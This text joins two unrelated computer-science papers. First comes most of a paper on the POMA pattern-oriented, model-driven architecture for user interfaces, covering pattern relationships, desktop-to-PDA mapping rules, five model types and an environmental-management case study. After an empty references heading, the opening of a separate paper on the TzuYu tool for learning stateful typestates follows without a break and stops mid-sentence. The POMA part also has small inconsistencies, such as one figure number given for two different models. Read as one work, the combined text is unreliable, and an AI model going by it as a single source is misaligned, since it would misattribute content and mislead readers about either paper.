A platform-independent pattern-oriented design exploits several relationships between patterns. Gamma et al. [2] emphasize that defining the list of related patterns as part of the description of a pattern is a key notion in the composition of patterns and their uses. Zimmer [15] implements this idea by dividing the relations between the patterns of the Gamma catalog... into three types: “X is similar to Y”, “X uses Y”, and “Variants of X use Y”. These types are, in practice, relationships between patterns in a specific context; in other words, they are relationships between instances of patterns. Based on Zimmer’s definitions [15], we define five types of relationships between patterns.

**Similar** Two patterns (X, Y) are similar, or equivalent, if and only if X and Y can be replaced by each other in a certain composition. This means that X and Y are patterns of the same category and they provide different solutions to the same problem in the same context. As illustrated in Figure 9, the *Index Browsing* and *Menu Bar* patterns are similar. They both provide navigational support in the context of a medium-sized interactive system.

![Figure 9: Similar patterns extracted from the OMG site](image)

**Competitor** Two patterns (X, Y) are competitors if X and Y cannot be used at the same time for designing the same artifact. This relationship applies to two patterns of the same pattern category: two patterns are competitors if and only if they are similar and interchangeable. For example, the Web patterns *Convenient Toolbar* and *Index Browsing* are competitors (Figure 10). The *Index Browsing* pattern can be used as a shortcut toolbar that allows a user to directly access a set of common services from any interactive system. The *Convenient Toolbar*, which provides the same solution, is generally considered more appropriate.
![Figure 10: Two Competitor patterns](image)

**Super-ordinate** A pattern X is a super-ordinate of pattern Y when pattern Y is used as a building block to create pattern X. An example is the Home Page pattern, which is generally composed of several other patterns (Figure 11).

Figure 11: Home Page pattern with sub-ordinate patterns

**Sub-ordinate** A pattern X is a sub-ordinate of pattern Y if and only if X is embeddable in Y. Y is then also called a super-ordinate of X. This relationship is important in the process of mapping a pattern-oriented design from one platform to another. For example, the Convenient Toolbar pattern (Figure 11) is a sub-ordinate of the Home Page pattern for either a PDA or a desktop system. Implementations of this pattern are different for different devices.

**Neighboring** Two patterns (X, Y) are neighboring if X and Y belong to the same pattern category. For example, the Sequential and Hierarchical patterns are neighboring because they belong to the same category of patterns; neighboring patterns may include the set of patterns for designing a specific page such as a home page (Figure 11).

2.4. Pattern Mapping

Another component in our architectural framework is the concept of pattern mapping. Pattern mapping is the process of creating a platform-specific model (PSM) for each platform from the PIM, by applying the mapping rules described below. Using a desktop system as a starting point, it is possible to redesign it for other platforms. The original set of patterns used in the system is mapped or replaced, in order to redesign and re-implement the system and, in particular, the UI for mobile or Personal Digital Assistant (PDA) systems. Since patterns hold information about design solutions and context of use, platform capabilities and constraints are implicitly addressed in the transformed patterns. To illustrate pattern mapping, we describe here the effect of screen size on the selection and use of patterns.
Different platforms use different screen sizes, and these different screen sizes afford different types and variants of patterns. The problem to resolve when mapping a pattern-oriented design (POD) is how the change in screen size between two platforms affects redesign at the pattern level. The amount of information that can be displayed on a given platform screen is determined by a combination of area and number of pixels. The total difference in information capacity between platforms will be somewhere between these two measures: 20 times the area and 10 times the pixels. To map the desktop display architecture to the PDA display architecture, the options are as follows: 1. To reduce the size of the architecture, it is necessary to reduce significantly both the number of pages and the quantity of information per page. 2. To hold the architecture size constant (i.e. topics or pages), it is necessary to significantly reduce the quantity of information per page (by a factor of about 10 to 20). 3. To retain all the information in the desktop architecture, it is necessary to significantly increase the size of the architecture, since the PDA can hold less information per page. The choice of mapping will depend on the size of the architecture and the value of the information: - For small desktop architectures, the design strategy can be weighted either toward reducing information if the information is not important, or toward increasing the number of pages if the information is important. - For medium and large desktop architectures, it is necessary to weight the design strategy heavily toward reducing the quantity of information, otherwise the architecture size and number of levels would rapidly explode out of control. Finally, we can consider mapping patterns and graphical objects in the context of the amount of change that must be applied to the desktop design or architecture to fit it into a PDA format. The following is the list of mapping rules we suggest: 1. 
**Identical**: No change to the original design. For example, drop-down menus can usually be copied from a desktop to a PDA without any design changes. 2. **Scalable**: Changes to the size of the original design or to the number of items in the original design. For example, a long horizontal menu can be adapted to a PDA by reducing the number of menu elements. 3. **Multiple**: Repeating the original design, either simultaneously or sequentially. For example, a single long menu can be transformed into a series of shorter menus. 4. **Fundamental**: Change the nature of the original design. For example, permanent left-hand vertical menus are useful on desktop displays, but are not practical on most PDAs. In mapping to a PDA, left-hand menus normally need to be replaced with an alternative such as a drop-down menu. These mapping rules can be used by designers in the selection of patterns, especially when different patterns apply for one platform but not for another, when the cost of adapting or purchasing a pattern is high, or when the applicability of a pattern (knowing how and when to apply a pattern) is questionable. This list of four mapping rules is especially relevant to the automation of cross-platform design mapping, since the designs that are easiest to map are those that require the least mapping. The category of patterns therefore identifies where human intervention will be needed for design decisions in the mapping process. In addition, when building a desktop design for which a PDA version is also planned, the category of patterns indicates which patterns to use in the desktop design to allow easy mapping to the PDA design. Figure 12 illustrates some of the navigation design patterns used in the home page of a desktop-based system. Once these patterns are identified in the desktop-based system, they can be mapped or replaced by others in a PDA version. 
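The four mapping rules above can be sketched as a dispatcher over a simple menu description. This is a hypothetical sketch: the dictionary layout, the four-item cutoff for the scalable rule, and the drop-down replacement for the fundamental rule are illustrative assumptions, not part of the method itself.

```python
def map_to_pda(menu: dict, rule: str) -> list:
    """Apply one of the four mapping rules to a desktop menu pattern.
    A menu is described as {"kind": ..., "items": [...]}; the result is a
    list because the 'multiple' rule yields more than one widget."""
    items = menu["items"]
    if rule == "identical":    # no change to the original design
        return [menu]
    if rule == "scalable":     # shrink: keep only the most important items
        return [{**menu, "items": items[:4]}]
    if rule == "multiple":     # repeat: split one long menu into shorter ones
        half = (len(items) + 1) // 2
        return [{**menu, "items": items[:half]}, {**menu, "items": items[half:]}]
    if rule == "fundamental":  # change the nature: e.g. replace with a drop-down
        return [{"kind": "drop-down menu", "items": items}]
    raise ValueError(f"unknown mapping rule: {rule}")
```

A real tool would choose the rule per pattern, as Table 3 later does for the case study; the sketch only shows that the first rules are mechanical while the fundamental rule substitutes a different pattern altogether.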
Figure 12: Patterns extracted from the CBC News site

Figure 13 demonstrates the redesigned interface of the CBC site for migrating to a PDA platform. The permanent horizontal menu pattern at the top (P5) in the original desktop UI was redesigned as a shorter horizontal menu pattern (P5s). In order to accommodate this change on the small PDA screen, the three different horizontal menus had to be shortened, and only important navigation items were used. The keyword search pattern (P13) remains as a keyword search. The permanent vertical menu on the left (P6) was redesigned as a drop-down menu (P15). The drop-down menu in the PDA design also includes the menu headings, “What’s on today?” and “Online features”, from the temporary vertical menu (P3) in the original desktop design. Finally, the information portal (P4), which is the first item that captures the user’s attention, was redesigned as a smaller information portal (P4s).

Figure 13: Migration of the CBC site to a PDA Platform using Pattern Mapping

3. Models and Model-Driven Design: Categorization and Transformation

3.1. About Models

As the complexity of interactive systems grows, the role of models is becoming essential for dealing with the numerous aspects involved in their development and maintenance processes. Models allow the relevant aspects of a system to be captured from a given perspective and at a specific level of abstraction. In a model-driven UI design approach, various models are used to describe the relevant aspects of the UI. Many facets exist, as well as related models. A design is an assembly of parts which realizes a specification. A model of a system is a specification of that system and its environment for some purpose. Models consist of a set of elements with a graphical and/or textual representation [56].
The idea behind model-driven design is to create different models of a system at different levels of abstraction, and to use transformations of the models to produce the implementation of the interactive systems. A number of distinct models have been suggested in the following work:

- the OMG’s Model-Driven Architecture [3, 4, 5, 6, 7],
- Si Alhir’s “Understanding the Model Driven Architecture (MDA)”, Methods & Tools [8],
- Paternò’s Model-Based Design and Evaluation of Interactive Systems [22],
- Vanderdonckt’s Task Modeling in Multiple Contexts of Use [23],
- Msheik’s Compositional Structured Component Model: Handling Selective Functional Composition [30],
- Puerta’s Modeling Tasks with Mechanisms [24].

In our work here, we investigate how these existing collections of models can be used as building blocks in the context of the five levels of the proposed POMA architecture. Our approach focuses on a subset of the proposed models and consists of:

- a domain model,
- a task model,
- a dialog model,
- a presentation model, and
- a layout model.

In the work reported in the next section, we describe how these models can be used at five levels of the proposed POMA architecture to create a model-driven architecture for interactive systems.

3.2. Model Categorization

A categorization of models is proposed next. Examples of models are also presented to illustrate the need to map and/or to transform several types of models to provide solutions to complex problems at the five architectural levels.

Domain Model

The Domain model is sometimes called a business model. It encapsulates the important entities of a system domain along with their attributes, methods, and relationships [13]. Within the scope of UI development, it defines the objects and functionalities accessed by the user via the interface. Such a model is generally developed using the information collected during the business and functional requirements stage.
The information defines the list of data and features or operations to be performed in various ways, i.e. by different users on different platforms. The first model-based approaches used a Domain model to drive the UI at runtime. In this context, the Domain model would describe the system in general, and include some specific information for the UI. For example, the Domain model [13] would include:

- a class hierarchy of objects which exist in the system,
- the properties of the objects,
- actions which can be performed on the objects,
- units of information (parameters) required by the actions, and
- pre- and post-conditions for the actions.

Domain models should represent the important entities along with their attributes, methods, and relationships. Consequently, the only real way to integrate UI and system development is the simultaneous use of the data model. That is why recent model-based approaches include a Domain model as known from system engineering methods. Four other models: Task, Dialog, Presentation, and Layout, have the Domain model as an input. Figure 14 is an example of the implementation of the Login pattern on the laptop platform.

![Figure 14: Login view of the system on the laptop platform](image)

Figure 15 is an example of the implementation of the Login pattern on the PDA platform.

![Figure 15: Login view of the system on the PDA platform](image)

Task model

The Task model makes it possible to describe how tasks can be performed to reach the user’s goals when interacting with an interactive system [22]. Using this model, designers can develop integrated descriptions of the system from a functional and interactive point of view. Task models are typically tasks and subtasks hierarchically decomposed into atomic actions [23]. In addition, the relationships between tasks are described with the execution order or dependencies between peer tasks. The tasks may contain attributes about their importance, their duration of execution, and their frequency of use.
For our purposes, we reuse the following definition: A **task** is a goal, along with the ordered set of tasks and actions that would satisfy it in the appropriate context. [13] This definition highlights the intertwining nature of tasks and goals. Actions are required to satisfy goals. Furthermore, the definition allows the decomposition of tasks into sub-tasks, and there exists some ordering among the sub-tasks and actions. In order to support this definition, we need to add the definitions of goal, action, and artifact: A **goal** is an intention to change or maintain the state of an artifact (based on [13]). An **action** is any act which has the effect of changing or maintaining the state of an artifact (based on [13]). An **artifact** is an object which is essential for a task. Without this object, the task cannot be performed; the state of this artifact is usually changed in the course of performance of a task. Artifacts are real things which exist in the context of task performance. In business, artifacts are modeled as objects and represented in the business model. This implies a close relationship between the Task model and the business model. With these definitions, we can derive the information that needs to be represented in a Task model. According to [13], the description of one task includes: - One goal, - A non-empty set of actions or other tasks which are necessary to achieve the goal, - A plan of how to select actions or tasks, and - A model of an artifact, which is influenced by the task. Consequently, the development of the Task model and the Domain model is interrelated. One of the goals of model-based approaches is to support user-centered interface design. Therefore, they must enable the UI designer to create the various Task models. Three other models: Dialog, Presentation, and Layout, have the Domain and Task models as inputs. Figure 16 represents the structure of the Task model of the environmental management system. 
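The definitions above (a task as a goal plus an ordered set of sub-tasks and actions, acting on an artifact) can be sketched as data structures. This is a hypothetical sketch: the field names, the `atomic_actions` helper, and the login example are ours, not part of [13].

```python
from dataclasses import dataclass, field
from typing import List, Optional, Union


@dataclass
class Artifact:
    """Object essential for a task; its state changes as the task is performed."""
    name: str
    state: str = "initial"


@dataclass
class Action:
    """An act which changes or maintains the state of an artifact."""
    name: str

    def perform(self, artifact: Artifact, new_state: str) -> None:
        artifact.state = new_state


@dataclass
class Task:
    """A goal together with the ordered set of sub-tasks and actions that satisfy it."""
    goal: str
    steps: List[Union["Task", Action]] = field(default_factory=list)
    artifact: Optional[Artifact] = None


def atomic_actions(task: Task) -> List[Action]:
    """Flatten the task hierarchy down to its atomic actions, in order."""
    out: List[Action] = []
    for step in task.steps:
        if isinstance(step, Task):
            out.extend(atomic_actions(step))
        else:
            out.append(step)
    return out
```

The recursive `steps` field captures the hierarchical decomposition into sub-tasks and atomic actions, while the `artifact` field records the object whose state the task is meant to change, mirroring the interrelation between Task and Domain models noted above.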
As shown in Figure 16, the Login, Multi-Value Input Form and Find patterns can be used in order to complete the Task model at the lower levels. Figure 16: Coarse-grained Task model of the environmental management system **Dialog Model** This model makes it possible to provide dialog styles to perform tasks and to provide proven techniques for the dialog. The Dialog model defines the navigational structure of the UI. It is a more specific model and can be derived in good measure from the more abstract Task, User, and Domain models. A dialog model is used to describe the human-computer conversation. It specifies when the end-user can invoke commands, functions, and interaction media, when the end-user can select or specify inputs, and when the computer can query the end-user and present information [26]. In other words, the Dialog model describes the sequencing of input tokens, output tokens, and the way in which they are interleaved. It describes the syntactical structure of human-computer interaction. The input and output tokens are lexical elements. Therefore, in particular, this model specifies the user commands, interaction techniques, interface responses, and command sequences permitted by the interface during user sessions. Two other models, Presentation and Layout, have the Domain, Task, and Dialog models as inputs. Figure 17 depicts the various dialog view interactions of the environmental management system’s suggested dialog graph structure for the laptop and PDA platforms. ![Figure 17: Dialog Graph of the environmental management system for the laptop and PDA platforms](image-url) Presentation Model The Presentation Model describes the visual appearance of the UI [13]. This model exists at two levels of abstraction: the abstract and the concrete. 
In fact, these two levels define the appearance and the form of presentation of the system, providing solutions as to how the contents or related services can be visually organized into working surfaces, the effective layout of multiple information spaces, and the relationship between them. Moreover, they define the physical and logical layout suitable for specific interactive systems such as home pages, lists, and tables. A Presentation model describes the constructs that can appear on an end-user’s display, their layout characteristics, and the visual dependencies among them. The displays of most systems consist of a static part and a dynamic part. The static part includes the presentation of the standard widgets like buttons, menus, and list boxes. Typically, the static part remains fixed during the runtime of the interactive system, except for state changes like enable/disable or visible/invisible. The dynamic part displays system-dependent data, which typically change during runtime (e.g. the system generates output information, while the end-user constructs system-specific data). The abstract level provides an abstract view of a generic interface, which represents the corresponding Task and Dialog models. Another model, Layout, has the Domain, Task, Dialog, and Presentation models as inputs. Figure 23 portrays the presentation model.

Layout Model

A Layout model constitutes a concrete instance of an interface. It consists of a series of UI components which defines the visual layout of a UI and the detailed dialogs for a specific platform and context of use. There may be many concrete instances of a Layout model which can be derived from the Presentation and Dialog models. This model makes it possible to provide conceptual models and architectures for organizing the underlying content across multiple pages, servers, databases, and computers. It is concerned with the look and feel of interactive systems and with the construction of a general drawing area (e.g.
a canvas widget), and all the outputs inside a canvas must be programmed using a general-purpose programming language and a low-level graphical library. Figure 23 portrays the layout model. 3.3. Transformation Rules Model transformation is the process of converting one or more models – called source models – to an output model – the target model – of the same system. Transformations may combine elements of different source models in order to build a target model. Transformation rules apply to all the types of models listed above. The following steps make up the list of transformation rules suggested in [17], and are considered as part of our framework: 1. Maintain tracking structures of all class instances where needed 2. Maintain tracking structures for Association populations where needed 3. Support state-machine semantics 4. Enforce Event ordering 5. Preserve Action atomicity 6. Provide a mapping for all analysis elements, including: - Domain, Domain Service - Class, Attribute, Association, Inheritance, Associative Class, Class Service - State, Event, Transition, Superstate, Substate - All Action-modeling elements The transformations between models [8] provide a path which enables the automated implementation of a system to be derived from the various models defined for it. 4. POMA Architecture 4.1 Overview of POMA The proposed architecture consists of six architectural levels of models using patterns (Figure 18) and UML specifications of system architecture for interactive systems development called POMA (Pattern-Oriented and Model-Driven Architecture). POMA enables us to specify and build interactive systems. It is an architecture which supports both novices and experts in system development. 
The architecture of system development (Figure 18) includes:

- A library of patterns by category used in the architecture, with their selection, composition, and mapping;
- The various models that we propose for the development of interactive systems, with their transformations (PIM to PIM, and PSM to PSM) and their mappings (PIM to PSM).

POMA is based on:

- Six architectural levels and categories of patterns;
- Ten models, five of which are [POMA.PIM] and five others which are [POMA.PSM];
- Four types of relations used in the POMA architecture, which are:
1. Composition: used to combine different patterns to produce a [POMA.PIM] by applying the composition rules
2. Mapping: used to build a [POMA.PIM] which becomes a [POMA.PSM] by applying the mapping rules
3. Transformation: used to establish the relationship between two models (PIM or PSM) by applying the transformation rules
4. Generation: used to generate the source code of the whole system by applying the code generation rules

The direction in which to read the POMA architecture in Figure 18 is as follows:

- Vertically, it is about the composition of the patterns to produce ten PIM and PSM models.
- Horizontally, it is about the composition and mapping of the patterns to produce five PIM and five PSM models, and the generation of the source code of the whole system (not included in this research).

Figure 18: POMA architecture for interactive systems development

5. Illustrative case study

This section presents a case study which describes the design of a non-functional UI prototype of a simplified environmental management system (Figure 23), illustrating and clarifying the core ideas of our approach and its practical relevance. It can also be used by an object-oriented designer to learn how to use design patterns. This environmental management system allows the analysis of the environment, its evolution and its economic and social dimensions, and proposes some indicators of performance.
The main objectives of environmental management are the treatment and distribution of water, improving air quality, monitoring noise, the treatment of waste, monitoring the health of fauna and flora, monitoring land use, preserving coastal and marine environments, and managing natural and technological risks (Figure 23). Note that only a simplified version of the environmental management system will be developed here. The system and corresponding models will not be tailored to different platforms or user roles. The main purpose of the example is to show that the development consists of a series of model transformations, in which mappings from abstract to concrete models must be specified. In addition, it illustrates how patterns are used to establish the various models, as well as to transform one model into another while respecting the pattern composition rules described above and the pattern mapping rules. We present below a general overview of the PIM and PSM models of the environmental management system, applying the pattern composition steps and mapping rules, as well as the transformation rules, for these five models. The details of this illustrative case study are presented in the Appendix, in which the following five models representing the same system are illustrated on a laptop platform and on a PDA platform: Domain model, Task model, Dialog model, Presentation model, and Layout model of the POMA architecture. Table 2 lists the patterns that will be used by the system. <table> <thead> <tr> <th>Pattern Name</th> <th>Model Type</th> <th>Problem</th> </tr> </thead> <tbody> <tr> <td>Login</td> <td>Domain</td> <td>The user’s identity needs to be authenticated in order to be allowed access to protected data and/or to perform authorized operations.</td> </tr> <tr> <td>Multi-Value Input Form</td> <td>Domain</td> <td>The user needs to enter a number of related values.
These values can be of different data types, such as “date”, “string”, or “real”.</td> </tr> <tr> <td>Submit</td> <td>Domain</td> <td>The user needs to submit coordinates to the authentication process to access the system.</td> </tr> <tr> <td>Feedback</td> <td>Domain</td> <td>The user needs help concerning the use of the Login Form.</td> </tr> <tr> <td>Close</td> <td>Domain</td> <td>The need to close the system from the Login form</td> </tr> <tr> <td>Find (Search, Browse, Executive Summary)</td> <td>Task</td> <td>The need to find indicators related to the task concerned, to find environmental patterns related to the indicators, and to find a presentation tool to display the results of the indicators and the environmental patterns</td> </tr> <tr> <td>Path (Breadcrumb)</td> <td>Task</td> <td>The need to construct and display the path that combines the data source, task, and/or subtask</td> </tr> <tr> <td>Index Browsing</td> <td>Task</td> <td>The need to display all indicators listed as index</td> </tr> <tr> <td>Adapter</td> <td>Task</td> <td>The need to convert the interface of a class into another interface that clients expect; an adapter lets classes work together which could not otherwise do so because of interface incompatibility</td> </tr> <tr> <td>Builder</td> <td>Task</td> <td>The need to separate the construction of a complex object from its representation, so that the same construction process can create different representations</td> </tr> <tr> <td>List</td> <td>Task</td> <td>The need to display the information using forms</td> </tr> <tr> <td>Table</td> <td>Task</td> <td>The need to display the information in tables</td>
</tr> <tr> <td>Map</td> <td>Task</td> <td>The need to display the information in geographic maps</td> </tr> <tr> <td>Graph</td> <td>Task</td> <td>The need to display the information in graphs</td> </tr> <tr> <td>Home Page</td> <td>Task</td> <td>The need to define the layout of an interactive system home page, which is important because the home page is the interactive system interface with the world and the starting point for most user visits</td> </tr> <tr> <td>Wizard (Welie, 2004)</td> <td>Dialog</td> <td>The user wants to achieve a single goal, but several decisions and actions need to be taken consecutively before the goal can be achieved.</td> </tr> <tr> <td>Recursive Activation (Paternò, 2000)</td> <td>Dialog</td> <td>The user wants to activate and manipulate several instances of a dialog view.</td> </tr> <tr> <td>Unambiguous Format</td> <td>Presentation</td> <td>The user needs to enter data, but may be unfamiliar with the structure of the information and/or its syntax.</td> </tr> <tr> <td>Form</td> <td>Presentation</td> <td>The user must provide structural textual information to the system. The data to be provided are logically related.</td> </tr> <tr> <td>House Style (Tidwell, 2004)</td> <td>Layout</td> <td>Usually, the system consists of several pages/windows. The user should have the impression that it all “hangs together” and looks like one entity.</td> </tr> </tbody> </table> Table 2: Pattern Summary To visualize the models, we have used an extended version of the ConcurTaskTree (CTT) notation. In addition to the predefined types, we have enhanced the CTT by adding a fifth type: The Pattern Task. Figure 19 shows the graphical representation of the pattern. Figure 19: Pattern symbol The [POMA.PIM]-independent model of the environmental management system is obtained by composing patterns between them and by taking into account the patterns composition rules – see Figure 20. 
The mapping rules of the patterns of the environmental management system for laptop and PDA platforms are listed in Table 3. <table> <thead> <tr> <th>HCI patterns of the Microsoft platform</th> <th>Type of mapping</th> <th>Replacement patterns for the laptop platform</th> <th>Replacement patterns for the PDA platform</th> </tr> </thead> <tbody> <tr> <td>P1. Login</td> <td>Identical</td> <td>P1. Login</td> <td>P1. Login</td> </tr> <tr> <td>P3. Submit</td> <td>Scalable or fundamental</td> <td>P3. Submit</td> <td>P3.s. Submit (smaller button)</td> </tr> <tr> <td>P6. Find (Search, Browse, Executive Summary)</td> <td>Identical, Scalable</td> <td>P6. Find (Search, Browse, Executive Summary)</td> <td>P6. Find (Search, Browse, Executive Summary)</td> </tr> <tr> <td>P7. Path (Breadcrumb)</td> <td>Identical, Scalable (laptop); Scalable or fundamental (PDA)</td> <td>P7. Path (Breadcrumb)</td> <td>- P7.1.s. Shorter Breadcrumb Trail - P7.2. Drop-down “History” menu</td> </tr> <tr> <td>P8. Index Browsing</td> <td>Identical</td> <td>P8. Index Browsing</td> <td>P8. Drop-down menu</td> </tr> <tr> <td>P12. Table</td> <td>Identical</td> <td>P12. Table</td> <td>P12. Table</td> </tr> <tr> <td>P14. Graph</td> <td>Identical</td> <td>P14. Graph</td> <td>P14. Graph</td> </tr> </tbody> </table> Table 3: Example of pattern mapping of the environmental management system model for laptop and PDA platforms After the mapping, we obtain the PSM model of the environmental management system for the laptop platform – see Figure 21 for its UML diagram. Figure 21: UML diagram of the PSM environmental management system model for the laptop platform Similarly, we obtain the PSM environmental management system model for the PDA platform – see the UML diagram of this model in Figure 22. A final UI of the environmental management system is shown in Figure 23. 
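The mapping rules in Table 3 can be read as a simple lookup: for each (pattern, target platform) pair, either the pattern is kept as-is (identical or scalable mapping) or it is replaced by one or more platform-specific variants. A minimal sketch in Python follows; the names and the subset of rules are illustrative, not part of any POMA tooling:

```python
# Hypothetical encoding of a few rows of Table 3: (pattern, platform) -> replacements.
MAPPING_RULES = {
    ("P3. Submit", "pda"): ["P3.s. Submit (smaller button)"],
    ("P7. Path (Breadcrumb)", "pda"): [
        "P7.1.s. Shorter Breadcrumb Trail",
        "P7.2. Drop-down 'History' menu",
    ],
    ("P8. Index Browsing", "pda"): ["P8. Drop-down menu"],
}

def map_pattern(pattern, platform):
    """Return the replacement patterns for a platform; identical mapping by default."""
    return MAPPING_RULES.get((pattern, platform), [pattern])
```

Applying `map_pattern` to every pattern of the PIM then yields the pattern list of the PSM for the chosen platform.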
![Figure 23: Screenshot of the environmental management system for the laptop platform](image) 6. Conclusion In this paper, our discussion focused on an architectural model combining two key approaches: model-driven and pattern-oriented. We first described an architectural level and categories of patterns (Navigation patterns, Interaction patterns, Visualization patterns, Presentation patterns, Interoperability patterns, and Information patterns), as well as the various relationships between patterns. These relationships are used to combine and map several types of patterns to create a pattern-oriented design for interactive systems, as well as to show how to generate specific implementations suitable for different platforms from the same pattern-oriented design. Then, we proposed five categories of models (Domain model, Task model, Dialog model, Presentation model, and Layout model) to address some of the challenging problems, such as: (a) decoupling the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; and (b) isolating platform-specific problems from the concerns common to all interactive systems. Finally, we presented a case study to illustrate and clarify the core ideas of our approach and its practical relevance. The Model-View-Controller (MVC), Model-View-Presenter (MVP), Presentation-Abstraction-Control (PAC), Seeheim, Arch/Slinky, PAC-Amadeus, and POMA architectures are similar in many ways, but each has evolved to address a slightly different concern. By becoming familiar with these architectures and other related architecture models, developers and architects will be better equipped to choose an appropriate solution in their next design endeavor, or possibly in the creation of future pattern-oriented and model-driven architectures. The current limitations of the POMA are the following: - There is a need to define measures to study the usability patterns that could be used in the POMA. 
- The patterns do not allow flexibility between the platform-independent specification of interfaces, the platform-specific form of those interfaces, and the eventual implementation of those interfaces. - The patterns do not constitute an approach to the full life-cycle integration and interoperability of enterprise systems comprising software, hardware, humans, and business practices. - The POMA does not encourage the designer to consider other aspects of the dialog which are very important to the user, like the help function or error handling. - The POMA does not facilitate the use of the design constraints or the description of the interface, which are of great importance to the designer [57; 58; 59; 60]. - Patterns are signs of weakness in programming languages. - Finding and applying the appropriate architectural patterns in practice still remains largely an ad hoc and unsystematic process; e.g., there is a lack of consensus in the community with respect to the “philosophy” and granularity of architectural patterns, and a lack of a coherent pattern language. Further research is required to address these limitations, one by one. The strengths of the POMA architecture are the following: - The POMA facilitates the use of patterns by beginners as well as experts. - The POMA supports the automation of both the pattern-driven and model-driven approaches to design. - The POMA ensures the quality of the applications produced, since a pattern-oriented architecture also has to enable the encapsulation of quality attributes and to facilitate prediction. - The POMA supports the communication and reuse of individual expertise as regards good design practices. - The POMA integrates all the various new technologies (including, but not limited to, traditional office desktops, laptops, palmtops, PDAs with and without keyboards, mobile telephones, and interactive televisions). 
In terms of the evolution of the POMA architecture, some of the next steps will include: - Generalization of the POMA architecture to all types of applications, not only interactive systems; - Proposal of a process for the generation of source code from the five POMA PSM models; - Building of a tool to automate the entire POMA architecture process, to facilitate the development of interactive applications of any category for both novice and expert users. 7. Acknowledgments We extend special thanks to Olivier ALNET, who participated in the development of the POMA architecture example. 8. References
TzuYu: Learning Stateful Typestates Hao Xiao*, Jun Sun*, Yang Liu†, Shang-Wei Lin† and Chengnian Sun‡ *Singapore University of Technology and Design †School of Computer Engineering, Nanyang Technological University ‡National University of Singapore Abstract—Behavioral models are useful for various software engineering tasks. They are, however, often missing in practice. Existing work either focuses on learning simple behavioral models such as finite-state automata, or relies on techniques (e.g., symbolic execution) to infer finite-state machines equipped with data states, referred to as stateful typestates. The former is often inadequate as finite-state automata lack expressiveness in capturing behaviors of data-rich programs, whereas the latter is often not scalable. In this work, we propose a fully automated approach to learn stateful typestates by extending the classic active learning process to generate transition guards (i.e., propositions on data states). The proposed approach has been implemented in a tool called TzuYu and evaluated against a number of Java programs. The evaluation results show that TzuYu is capable of learning correct stateful typestates efficiently. Index Terms—Typestate; Learning; Testing I. INTRODUCTION Behavioral models or specifications are useful for various software engineering tasks. For instance, (object) typestates [26], [11], [19], [9] are important for program debugging and verification. A precise (and preferably concise) typestate is useful for understanding third-party programs. In practice, however, such models are often inadequate and incomplete. To overcome this problem, learning based specification mining [4] was proposed to automatically generate behavioral models from various software artifacts, e.g., source code [2], execution traces [21] and natural language API documentations [29]. This approach is promising as it requires no extra user efforts. 
Existing approaches on learning typestates (also known as interface specification [3]) can be broadly categorized into two groups. One focuses on learning behavioral models in the forms of finite-state automata, without data states. These methods are often inadequate in practice, as it is known that finite-state automata lack expressiveness in modeling data-rich programs. Consider a simple example of a Stack class with two operations: push and pop. A typestate of the Stack should specify the following language: the number of push operations in any valid trace of the model must be no less than the number of pop operations. It is known that this language is irregular and therefore beyond the expressiveness of finite-state automata. On the other hand, the model of the Stack can be easily expressed using a finite-state machine with a guard condition on the pop operation: size $\geq 1$ where size denotes the number of items in the stack. The central issue is thus: how to identify the proposition size $\geq 1$ systematically and automatically. The other group learns stateful typestates using relatively heavy-weight techniques like SMT/SAT solving. For instance, in paper [3], the authors proposed to synthesize interface specification for Java classes based on predicate abstraction, which relies on theorem proving. Similarly, in paper [13], the authors propose to learn typestates through symbolic execution (which relies on SMT solving) and refinement. Given that existing theorem proving and SMT/SAT techniques are still limited in handling complicated data structures and control flows, these methods are often limited to small programs. In this paper, we propose an alternative approach to learning stateful typestates from Java programs. The key idea is to extend an active learning algorithm with an approach to automatically learning transition guards (i.e., propositions on data states). 
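The guarded Stack model sketched above can be made concrete with a few lines of Python (an illustration of the idea, not the paper's implementation): the pop transition carries the guard size ≥ 1 on the data state, so the model accepts exactly the traces in which pops never outnumber pushes.

```python
def is_valid_trace(trace):
    """Replay a sequence of 'push'/'pop' events against the guarded Stack model."""
    size = 0  # abstraction of the data state: number of items on the stack
    for event in trace:
        if event == "push":
            size += 1
        elif event == "pop":
            if size >= 1:      # the guard on the pop transition
                size -= 1
            else:
                return False   # guard violated: pop on an empty stack fails
        else:
            raise ValueError("unknown event: " + event)
    return True
```

Note that the single integer `size` is what makes this finite description possible: without the guard, no finite-state automaton can capture the same language.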
Our approach takes the source code of a class as the only input and generates a stateful typestate through a series of testing, learning and refinement steps. Fig. 1 shows the high-level architecture of our approach. There are three main components. An active learner constructs a typestate based on the L* algorithm [5]. It drives the learning process by generating two kinds of queries. One is the membership query, i.e., whether a sequence of events (i.e., a trace) of the current typestate is valid. The other is the candidate query, i.e., whether a candidate typestate matches the ‘actual’ typestate. A tester acts as a teacher in the classic active learning setting. It takes queries from the learner and responds accordingly based on testing results. In the original L* algorithm, the model to be learned is a finite-state automaton and a trace can be either valid or invalid but never both. However, in our setting, it is possible that two executions have the same sequence of method calls on the same object but lead to different outcomes (i.e., error or no-error), due to different inputs to the method calls (which in turn result in different data states). In such a case, alphabet refinement is performed by splitting one event into multiple events, each of which has a different guard condition, so that the traces are distinguished. The refiner in Fig. 1 is used to automatically identify proper guard conditions. In the following, we use a simple example to illustrate how our method works. We take the java.util.Stack class in Java (SE 1.4.2) as the running example. Without loss of generality, let us focus on the following two methods: push (which takes an object as an input) and pop, and one data field eleCount (inherited from the java.util.Vector class) which denotes the number of elements in the stack. Initially, we have an alphabet containing two events corresponding to the two methods. 
Given an instance of the Stack class, the learner generates a number of membership queries, i.e., sequences of method calls. Given one membership query, the tester generates multiple test cases which have the same sequence of method calls (with different arguments) and answers the query. The queries and testing results are summarized in the observation table (introduced in detail in Section II-B), as shown in Fig. 2 (a), where ε denotes the empty sequence of method calls and ⟨pop⟩ denotes the sequence consisting of a single call of pop. The 0s in the pop column denote that all tests generated for the corresponding sequence followed by pop result in an exception or assertion failure (hereafter failure). The 1s denote that none of the tests result in failure. Based on the observation table, the learner generates a candidate typestate as presented in Fig. 2 (b). Note that the typestate is a finite-state automaton with one accepting state, i.e., state A. Next, the learner asks a candidate query, i.e., is the typestate in Fig. 2 (b) the right typestate? The tester takes the candidate typestate and performs random walking, i.e., randomly generates a set of tests which correspond to traces of the typestate. Notice that a trace of the typestate is either accepting (i.e., ending with an accepting state) or otherwise. Through the random walking, the tester identifies one inconsistency between the typestate and the class under analysis. That is, the typestate predicts that calling pop from state A always results in failure, whereas this is not always the case. For instance, calling method push first (which leads to state A) and then pop results in no failure. The existence of the inconsistency suggests that the typestate 